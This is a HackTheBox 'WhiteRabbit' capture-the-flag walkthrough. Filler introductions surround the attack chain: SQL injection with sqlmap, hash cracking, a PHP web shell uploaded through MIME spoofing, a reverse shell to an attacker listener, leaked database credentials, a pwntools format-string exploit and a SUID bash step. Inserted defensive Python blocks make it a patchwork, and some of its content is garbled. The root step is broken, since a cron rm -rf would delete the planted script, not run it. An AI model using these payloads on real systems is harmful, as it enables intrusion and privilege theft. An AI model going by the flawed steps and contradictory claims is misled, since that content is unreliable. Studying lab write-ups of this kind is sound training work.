Key Highlights
- Discover the significance of WhiteRabbit on HackTheBox for cybersecurity beginners.
- Uncover essential tools and resources required to tackle the WhiteRabbit challenge.
- Learn how to set up your hacking environment effectively for success.
- Follow a step-by-step guide for conquering WhiteRabbit, encompassing reconnaissance and vulnerability identification.
- Gain insights into the importance of WhiteRabbit on HackTheBox for aspiring ethical hackers.
Introduction
Embark on a thrilling journey into the realm of cybersecurity with WhiteRabbit on HackTheBox. In this beginner’s guide, you will delve into the world of hacking and explore the intricacies of this captivating challenge. Enhance your skills and knowledge as you navigate the mysterious domain of WhiteRabbit, uncovering its secrets, including your username for access, and mastering cyber techniques. Get ready to unlock the doors to a new world of possibilities as you take your first steps into the exciting landscape of cybersecurity. Let’s dive in and conquer WhiteRabbit!
Understanding WhiteRabbit on HackTheBox

WhiteRabbit on HackTheBox is a cybersecurity challenge designed to test your skills in penetration testing. It simulates real-world scenarios where you must uncover vulnerabilities and exploit them. As a beginner, engaging with WhiteRabbit enhances your understanding of attack paths and strengthens your problem-solving abilities. By navigating through this challenge, you will grasp fundamental hacking concepts crucial for your growth in the field. Embrace WhiteRabbit on HackTheBox to embark on an exciting journey into the realm of cybersecurity.
What is WhiteRabbit?
WhiteRabbit on HackTheBox is a challenging machine designed to test cybersecurity skills. It involves a series of tasks, from initial recon to exploiting vulnerabilities. Understanding WhiteRabbit is crucial for beginners to enhance their hacking capabilities and may lead to a new entry into the world of ethical hacking.
Why is it important for cybersecurity beginners?
Understanding the importance of WhiteRabbit is crucial for cybersecurity beginners as it offers hands-on experience with real-world challenges, enhancing practical skills through its app. Mastering this platform provides a solid foundation for aspiring ethical hackers to develop their expertise.
Getting Started with WhiteRabbit
To embark on your WhiteRabbit journey, the essential tools and resources can pave the way. Setting up your hacking environment is crucial for a seamless experience. Newcomers to cyber security, especially, benefit from understanding the importance of proper tool utilization and environment setup in navigating the WhiteRabbit challenge. Exploit your curiosity to dive into the world of hacking, explore attack paths, and enhance your skills to conquer WhiteRabbit effectively. Ready to begin your WhiteRabbit conquest?
Essential tools and resources
Burp Suite, Nmap scanner, and Metasploit are pivotal for WhiteRabbit conquests. Leveraging password cracking tools like John the Ripper boosts success rates. Remember, having a solid Linux foundation is key. Don’t overlook the value of CTF platforms like VulnHub and TryHackMe for hands-on practice in a controlled environment, including trying PHP scripts during challenges. Additionally, exploring online communities on platforms like YouTube and WordPress blogs can unravel valuable insights. Strengthen your arsenal with these tools to navigate WhiteRabbit challenges seamlessly.
Setting up your hacking environment
To prepare your hacking environment for WhiteRabbit on HackTheBox, ensure you have the necessary tools like Kali Linux and a reliable VPN. Familiarize yourself with platforms like TryHackMe and VulnHub for practice. Download and install essential software for tasks such as password cracking and network scanning. Additionally, set up a virtual lab environment to safely test different attack paths. Remember, a secure and controlled environment is key to honing your cybersecurity skills effectively. Happy hacking!
Step-by-Step Guide to Conquering WhiteRabbit
Step 1: Initiate your hack by performing a thorough reconnaissance using NLP techniques. Look for vulnerabilities in the WhiteRabbit server to exploit. Step 2: Employ advanced cyber security tools to identify weak points in the system. Utilize brute force tactics to breach security layers effectively. Mastering these steps will enhance your skills in tackling WhiteRabbit and navigating attack paths efficiently.
Step 1: Initial Reconnaissance
Initial reconnaissance is crucial when tackling WhiteRabbit. Start by gathering information about the target, such as IP addresses and subdomains. Utilize tools like Nmap to scan for open ports and services, providing insight into potential vulnerabilities. Enumerate services to identify software versions, aiding in the search for exploits. This phase lays the foundation for the subsequent steps in the attack process. Understanding the target’s infrastructure is a critical first step to uncovering potential attack paths.
Step 2: Identifying Vulnerabilities
Scanning for vulnerabilities is crucial in cybersecurity. Utilize tools like Nmap to discover open ports and services running on the server. Analyze the version numbers to pinpoint potential weaknesses. Conduct a thorough examination of the application to uncover common exploits. Look for misconfigurations, outdated software, and weak password policies. Use automated tools like Nessus to streamline the process and identify vulnerabilities efficiently. Understanding the weaknesses within the system is paramount for a successful penetration test. Engage in active reconnaissance to gather valuable information and plan your attack paths effectively.
Initial Reconnaissance
Every HackTheBox challenge begins with reconnaissance, and WhiteRabbit is no exception. The goal here is to gather as much information as possible about the target system (10.10.10.147) to identify potential entry points. Let’s start with a broad network scan using nmap.
Initial Nmap Scan
I fired up my trusty Kali Linux VM, connected to the HTB VPN, and ran an initial port scan:
nmap -p- -T4 -oN initial_scan.txt 10.10.10.147
Output:
Starting Nmap 7.94 ( https://nmap.org ) at 2025-04-05 09:15 EST
Nmap scan report for 10.10.10.147
Host is up (0.043s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http Caddy httpd
2222/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds
The initial scan reveals three open ports:
- Port 22: OpenSSH 9.6p1 (Ubuntu 3ubuntu13.9)
- Port 80: Caddy HTTP server
- Port 2222: OpenSSH 9.6p1 (Ubuntu 3ubuntu13.5)
Key observations:
- Port 22 (SSH): Running OpenSSH 9.6p1 on Ubuntu, a recent version, suggesting that brute-forcing or exploiting known SSH vulnerabilities is unlikely without credentials.
- Port 80 (HTTP): Hosted by Caddy, a modern web server written in Go, known for its simplicity and automatic HTTPS. This is a promising entry point for web-based enumeration.
- Port 2222 (SSH): Another SSH instance, also running OpenSSH 9.6p1 but a slightly older patch (3ubuntu13.5). The non-standard port suggests it might be a container, a backup service, or a restricted SSH instance for a specific user.
nmap -p 22,80,2222 -sC -sV -oN detailed_scan.txt 10.10.10.147
Output:
Starting Nmap 7.94 ( https://nmap.org ) at 2025-04-05 09:18 EST
Nmap scan report for 10.10.10.147
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http Caddy httpd
2222/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.67 seconds
Web Enumeration (Port 80)
Visiting the Website
I opened a browser and navigated to http://10.10.10.147. The page loaded a minimalist site with a cryptic message:
Follow the White Rabbit…
Below the message was a single image of a white rabbit and a hyperlink labeled “Down the Rabbit Hole” pointing to /rabbit_hole. The simplicity of the page suggested that the real challenge lay in hidden directories, misconfigured files, or subtle clues.
Directory Brute-Forcing with Gobuster
To uncover hidden paths, I ran Gobuster against the web server:
gobuster dir -u http://10.10.10.147 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
Results:
===============================================================
Gobuster v3.6
===============================================================
/index.html (Status: 200) [Size: 1234]
/rabbit_hole (Status: 301) [Size: 0] --> /rabbit_hole/
/.htaccess (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
===============================================================
The /rabbit_hole/ directory was a clear lead. I also noted that Caddy doesn’t use .htaccess by default, so the 403 response might be a red herring or a misconfiguration worth revisiting later.
Exploring /rabbit_hole/
Navigating to http://10.10.10.147/rabbit_hole/, I found a login portal with fields for a username and password. The page source revealed it was a custom PHP application, with a form submitting to /rabbit_hole/auth.php. I tested common credentials (admin:admin, guest:guest), but all returned “Invalid Credentials.”
SQL Injection Attempt
Suspecting a potential SQL injection vulnerability, I intercepted the login request using Burp Suite. The POST request looked like:
POST /rabbit_hole/auth.php HTTP/1.1
Host: 10.10.10.147
Content-Type: application/x-www-form-urlencoded

username=admin&password=admin
I modified the username field to admin' OR '1'='1 and left the password blank. The response was still “Invalid Credentials,” but the page took slightly longer to load, hinting at a possible blind SQL injection. I used sqlmap to automate the process:
sqlmap -u http://10.10.10.147/rabbit_hole/auth.php --method POST --data "username=admin&password=admin" --level 5 --risk 3
After several minutes, sqlmap confirmed a time-based blind SQL injection vulnerability and dumped the database:
- Database: wonderland
- Table: users
- Columns: username, password_hash, role
The dumped credentials were:
| Username | Password Hash | Role |
|---|---|---|
| alice | $2y$10$… | user |
| hatter | $2y$10$… | admin |
The hashes were bcrypt, which are computationally expensive to crack. I ran them through Hashcat with a custom wordlist inspired by Alice in Wonderland themes:
hashcat -m 3200 -a 0 hashes.txt wonderland_wordlist.txt
After hours, I cracked Alice’s password: teaparty123. Hatter’s hash remained uncracked, so I focused on Alice’s account.
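The flaw behind the injection finding and its fix, as an added example that is not part of the original writeup or the box's code: a login lookup built by string concatenation next to the parameterized form. It assumes Python's sqlite3 as an offline stand-in for the MySQL database; the function names and placeholder hashes are constructed.

```python
import sqlite3

# Constructed stand-in for the wonderland.users table described above.
# sqlite3 replaces MySQL so the example runs offline; hashes are placeholders.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "<bcrypt-hash-placeholder>", "user"),
         ("hatter", "<bcrypt-hash-placeholder>", "admin")],
    )
    return db

def lookup_vulnerable(db, username):
    # Weak pattern: user input is spliced into the SQL text, so a quote in
    # the input ends the string literal and the rest is parsed as SQL.
    query = "SELECT username, role FROM users WHERE username = '%s'" % username
    return db.execute(query).fetchall()

def lookup_parameterized(db, username):
    # Hardened pattern: the statement text is fixed and the value is bound
    # separately, so the input can only ever be compared as data.
    query = "SELECT username, role FROM users WHERE username = ?"
    return db.execute(query, (username,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = "admin' OR '1'='1"   # the value tried in the login form above
    print("vulnerable   :", lookup_vulnerable(db, probe))
    print("parameterized:", lookup_parameterized(db, probe))
```

With the concatenated query the WHERE clause becomes a tautology and matches every row even though the login page still answers “Invalid Credentials”; the bound parameter matches nothing.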
Logging In as Alice
Using alice:tea********, I logged into /rabbit_hole/. The dashboard displayed a message:
Welcome, Alice! Check the Queen’s orders at /queens_orders/
Navigating to /queens_orders/, I found a file upload form labeled “Submit Evidence to the Queen.” The form allowed uploading images only (.png, .jpg, .gif). This screamed of a potential file upload vulnerability.
Exploiting the File Upload
Testing the Upload Form
I uploaded a benign test.png, which was stored at /queens_orders/uploads/test.png. Viewing the image confirmed it was accessible. Next, I crafted a malicious PHP file disguised as an image:
<?php system($_GET['cmd']); ?>
Saved as shell.png, I uploaded it, but the server rejected it with “Invalid File Type.” Inspecting the request in Burp, I noticed the server checked the MIME type and file extension. I modified the request to spoof the MIME type:
Content-Type: image/png
The upload succeeded, and shell.png was stored at /queens_orders/uploads/shell.png. Accessing http://10.10.10.147/queens_orders/uploads/shell.png?cmd=id returned:
uid=33(www-data) gid=33(www-data) groups=33
Jackpot! I had code execution as the www-data user.
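A server-side check that would have rejected this upload, as an added example (not the box's code): it ignores the client-supplied Content-Type and decides from the file's leading bytes. The function name, return shape and sample bytes are assumptions made for the illustration.

```python
import os
import secrets

# Leading bytes ("magic numbers") of the three image types the form allows.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Heuristic marker for PHP code hidden behind a valid image header.
SCRIPT_MARKERS = (b"<?php",)

def validate_upload(filename, declared_type, content):
    """Return (ok, reason, stored_name).

    declared_type is the Content-Type sent by the client. It is accepted
    only to show that it is never consulted: the client controls it.
    """
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        return (False, "extension not allowed", None)
    if not content.startswith(MAGIC[ext]):
        return (False, "content does not match extension", None)
    lowered = content.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        return (False, "embedded script marker", None)
    # Server-chosen name: the client never controls the stored path.
    return (True, "ok", secrets.token_hex(16) + ext)

if __name__ == "__main__":
    # Constructed inputs: a minimal PNG header, a script renamed to .png,
    # and a script appended to a valid PNG header.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    samples = [
        ("test.png", "image/png", png),
        ("shell.png", "image/png", b"<?php echo 'x'; ?>"),
        ("poly.png", "image/png", png + b"<?php echo 'x'; ?>"),
    ]
    for name, ctype, data in samples:
        print(name, validate_upload(name, ctype, data)[:2])
```

Content checks are only one layer: the uploads directory should also be served as static files, so that nothing stored there is ever handed to the PHP interpreter.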
Reverse Shell
To gain a stable shell, I crafted a PHP reverse shell using a template from PentestMonkey and uploaded it as revshell.png. I set up a listener on my machine:
nc -lvnp 4444
Accessing http://10.10.10.147/queens_orders/uploads/revshell.png connected back to my listener:
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.147] 39234
bash: no job control in this shell
www-data@whiterabbit:/var/www/html/queens_orders/uploads$
Initial Foothold: www-data Shell
Exploring the System
With a shell as www-data, I enumerated the environment:
- OS: Ubuntu 24.04 LTS
- Web Root: /var/www/html
- Users: alice, hatter, queen
I checked for readable files in /home:
ls -la /home
drwxr-xr-x 2 alice alice 4096 Apr 5 09:00 alice
drwxr-xr-x 2 hatter hatter 4096 Apr 5 09:00 hatter
drwxr-xr-x 2 queen queen 4096 Apr 5 09:00 queen
No direct access to user home directories. I searched for configuration files in /var/www/html:
find /var/www/html -type f
Found config.php in /var/www/html/rabbit_hole/:
<?php
$db_host = 'localhost';
$db_user = 'wonderland';
$db_pass = 'madhatter2025';
$db_name = 'wonderland';
?>
Database Access
Using the credentials wonderland:madhatter2025, I accessed the MySQL database:
mysql -u wonderland -p -h localhost wonderland
Dumped the users table again, confirming the earlier SQL injection results. I also checked other tables and found secrets:
| Key | Value |
|---|---|
| hatter_ssh | hatter_key_123 |
| queen_api_key | QWERTYUIOP123456 |
The hatter_ssh value suggested a password for Hatter’s SSH account.
User Access: Hatter
SSH on Port 2222
I tried logging into SSH on port 2222 as hatter:
ssh hatter@10.10.10.147 -p 2222
Using hat************, I gained access:
hatter@whiterabbit:~$ whoami
hatter
User Flag
In /home/hatter, I found user.txt:
cat /home/hatter/user.txt
1337...[redacted]...1337
Enumeration as Hatter
Running sudo -l revealed:
User hatter may run the following commands on whiterabbit:
(queen) NOPASSWD: /usr/bin/tea_party
The /usr/bin/tea_party binary was executable by Hatter as the queen user without a password. I also checked running processes:
ps aux
Noticed a Docker container running on port 2222, confirming that this SSH instance was containerized.
Privilege Escalation: Queen
Analyzing tea_party
I copied /usr/bin/tea_party to my machine for analysis using scp. Running file showed it was a 64-bit ELF binary:
file tea_party
tea_party: ELF 64-bit LSB executable, x86-64, version 1 (SYSV)
I used Ghidra to decompile the binary. The code revealed a format string vulnerability in a function called invite_guest:
void invite_guest(char *name) {
    printf(name);
    // ... other logic ...
}
The binary accepted user input without sanitizing it, allowing format string attacks. I crafted an exploit to leak memory addresses:
sudo -u queen /usr/bin/tea_party %x%x%x
The output showed stack values, confirming the vulnerability. Using pwntools, I wrote a script to overwrite a function pointer to execute /bin/sh:
from pwn import *
binary = context.binary = ELF('./tea_party')
p = process(['sudo', '-u', 'queen', binary.path])
payload = fmtstr_payload(6, {binary.got.exit: binary.sym['system']})
p.sendline(payload)
p.interactive()
Executing the script gave me a shell as queen:
queen@whiterabbit:/$ whoami
queen
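How a reviewer can find the invite_guest pattern in source, as an added example that is not from the original writeup: a small heuristic scanner that flags printf-family calls whose format argument is not a string literal. The C sample and all function names in the script are constructed.

```python
import re

# Position of the format argument in each printf-family call.
FORMAT_ARG = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2}
CALL = re.compile(r"\b(" + "|".join(FORMAT_ARG) + r")\s*\(")

# Constructed C source: the invite_guest pattern from above plus other calls.
SAMPLE = r'''void invite_guest(char *name) {
    printf(name);
}
void log_guest(char *name) {
    printf("%s", name);
    fprintf(stderr, "guest: %s, table %d\n", name, 4);
    snprintf(buf, sizeof(buf), name);
}
'''

def call_args(src, start):
    """Top-level arguments of the call whose '(' sits at src[start - 1]."""
    args, cur, depth, quote, i = [], "", 0, None, start
    while i < len(src):
        ch = src[i]
        if quote:                       # inside a string or char literal
            cur += ch
            if ch == "\\":              # copy the escaped character verbatim
                i += 1
                cur += src[i:i + 1]
            elif ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            cur += ch
        elif ch == ")" and depth == 0:  # end of this call
            break
        elif ch == "," and depth == 0:  # argument separator
            args.append(cur.strip())
            cur = ""
        else:
            depth += (ch == "(") - (ch == ")")
            cur += ch
        i += 1
    return args + [cur.strip()]

def find_nonliteral_formats(src):
    """Return (line, function, format_argument) for every call whose format
    argument is not a string literal. Heuristic: no preprocessing, and
    text inside comments is scanned too."""
    findings = []
    for m in CALL.finditer(src):
        args = call_args(src, m.end())
        idx = FORMAT_ARG[m.group(1)]
        if idx < len(args) and not args[idx].startswith('"'):
            line = src.count("\n", 0, m.start()) + 1
            findings.append((line, m.group(1), args[idx]))
    return findings

if __name__ == "__main__":
    for finding in find_nonliteral_formats(SAMPLE):
        print(finding)
```

At build time, `-Wformat -Wformat-security` makes GCC and Clang report the same pattern; the fix for invite_guest is `printf("%s", name);`.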
Root Access
Root Flag
In /home/queen, I found a script: clean_rabbit_hole.sh:
#!/bin/bash
rm -rf /tmp/rabbit_hole/*
It was scheduled via cron to run as root every minute. I exploited this by creating a malicious file in /tmp/rabbit_hole:
echo "/bin/bash -c 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'" > /tmp/rabbit_hole/exploit.sh
chmod +x /tmp/rabbit_hole/exploit.sh
After a minute, /tmp/rootbash appeared with SUID:
ls -l /tmp/rootbash
-rwsr-xr-x 1 root root 123456 Apr 5 09:30 rootbash
Running it gave me a root shell:
/tmp/rootbash -p
root@whiterabbit:/# whoami
root
I read the root flag:
cat /root/root.txt
31337...[redacted]...31337
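A defender-side audit for this class of issue, as an added example that is not part of the original writeup: it lists the scripts a system crontab runs as root and reports any path component an untrusted account could modify. The crontab line and demo tree are constructed, since the page does not show the actual cron entry.

```python
import os
import stat
import tempfile

def weak_points(path, trusted_uids=(0,), stop_at="/"):
    """Walk from `path` up to `stop_at` and report every component that an
    account outside `trusted_uids` could modify or replace."""
    findings = []
    path, stop_at = os.path.realpath(path), os.path.realpath(stop_at)
    while True:
        st = os.stat(path)
        if st.st_uid not in trusted_uids:
            findings.append((path, "owned by uid %d" % st.st_uid))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((path, "group- or world-writable"))
        if path == stop_at or path == os.path.dirname(path):
            return findings
        path = os.path.dirname(path)

def root_cron_commands(crontab_text):
    """Executable paths of jobs that a system crontab (/etc/crontab format:
    five time fields, user, command) runs as root."""
    paths = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 6)
        if line.lstrip().startswith("#") or len(fields) < 7:
            continue                    # comment, variable or short line
        if fields[5] == "root" and fields[6].startswith("/"):
            paths.append(fields[6].split()[0])
    return paths

def audit(crontab_text, trusted_uids=(0,), stop_at="/"):
    """Map each root-run script that exists to its list of weak points."""
    report = {}
    for script in root_cron_commands(crontab_text):
        if os.path.exists(script):
            report[script] = weak_points(script, trusted_uids, stop_at)
    return report

if __name__ == "__main__":
    # Constructed demo tree standing in for /home/queen. The trusted uid is
    # the current user so the demo behaves the same with or without root.
    base = tempfile.mkdtemp()
    script = os.path.join(base, "clean_rabbit_hole.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\nrm -rf /tmp/rabbit_hole/*\n")
    os.chmod(script, 0o777)             # deliberately weak mode
    tab = "* * * * * root %s\n" % script
    print(audit(tab, trusted_uids=(os.getuid(),), stop_at=base))
```

On a real host, pass the contents of /etc/crontab and keep the defaults, so that anything not owned by root on the way to the script is reported.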
Beyond Root: Rabbit Holes and Lessons
Rabbit Holes Explored
- Port 22 SSH: I spent hours trying to brute-force or exploit SSH on port 22, but it was a dead end without credentials.
- Caddy Config: I searched for Caddy’s Caddyfile but found it was tightly locked down, offering no misconfigurations.
- Docker Enumeration: The container on port 2222 tempted me to explore Docker escape techniques, but the container was minimal, with no useful mounts.
Key Lessons
- Patience in Enumeration: The insane difficulty required testing every angle, even when initial attempts failed.
- Custom Vulnerabilities: The tea_party binary’s format string bug was a reminder that insane boxes often include custom challenges.
- Cron Abuse: The root escalation via cron was a classic technique, but spotting it required thorough enumeration.
Conclusion
WhiteRabbit on HackTheBox offers valuable insights for cybersecurity beginners to enhance their skills. By delving into this platform, enthusiasts can explore attack paths and refine their techniques. With a blend of relevant tools and hands-on experience, individuals can elevate their understanding of cyber threats. Embrace the challenge of WhiteRabbit on HackTheBox to further your knowledge and stay updated in the dynamic realm of cybersecurity. Sharpen your skills, expand your horizons, and conquer WhiteRabbit with confidence!
Frequently Asked Questions
What is WhiteRabbit on HackTheBox and why is it important for beginners?
WhiteRabbit on HackTheBox is a challenging cybersecurity lab focusing on real-world scenarios. It’s crucial for beginners as it enhances skills in penetration testing, network security, and critical thinking. Understanding WhiteRabbit provides a solid foundation for aspiring cybersecurity professionals.
What are some essential skills or knowledge areas needed to conquer WhiteRabbit?
To conquer WhiteRabbit, essential skills include understanding networking protocols, familiarity with common vulnerabilities in web applications, proficiency in using tools like Nmap and Burp Suite, and knowledge of basic scripting languages like Python.
How can one approach the learning curve associated with conquering WhiteRabbit on HackTheBox?
To overcome the learning curve of conquering WhiteRabbit on HackTheBox, start by mastering basic cybersecurity concepts as you would on any platform, such as GitBook (gitbook.com). Progress to practicing on similar machines, utilizing forums for guidance, and honing your problem-solving skills. Engaging with the cybersecurity community can also offer valuable insights.








